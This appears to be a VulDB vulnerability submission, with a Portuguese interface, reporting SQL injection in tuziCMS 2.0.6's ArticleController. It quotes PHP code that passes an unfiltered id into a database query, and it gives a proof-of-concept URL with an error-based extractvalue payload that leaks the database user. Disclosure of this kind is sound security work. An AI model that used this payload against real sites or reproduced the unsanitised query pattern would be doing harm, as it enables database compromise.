Submeter #71150: tuziCMS 2.0.6 App\Manage\Controller\ArticleController.class.php has SQLinjectinformação

TítulotuziCMS 2.0.6 App\Manage\Controller\ArticleController.class.php has SQLinject
Descriçãohello, i am a newcomer. First submission vulnerability. A vulnerability classified as serious was found. The article module does not filter the id parameter. Causes a SQL injection vulnerability.It can query sensitive data, operate database and other hazards. code: \App\Manage\Controller\ArticleController.class.php line: 18 - 22 public function index(){ C('TOKEN_ON',false);//关闭表单令牌 //查询指定id的栏目信息 $id=I('get.id');//类别ID $topcate=M('Column')->where("id=$id")->order('column_sort')->select(); // dump($topcate); // exit; POC: http: //127.0.0.1/tuzicms/index.php/Manage/Article/index/id/1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)))
Fonte⚠️ https://github.com/yeyinshi/tuzicms/issues/12
Utilizador
 Evilmu1 (UID 38763)
Submissão12/01/2023 04h47 (há 3 anos)
Moderação12/01/2023 15h46 (11 hours later)
EstadoAceite
Entrada VulDB218151 [TuziCMS 2.0.6 Article ArticleController.class.php index ID Injeção SQL]
Pontos20

VoltarVisão GeralPróximo

Do you want to use VulDB in your project?

Use the official API to access entries easily!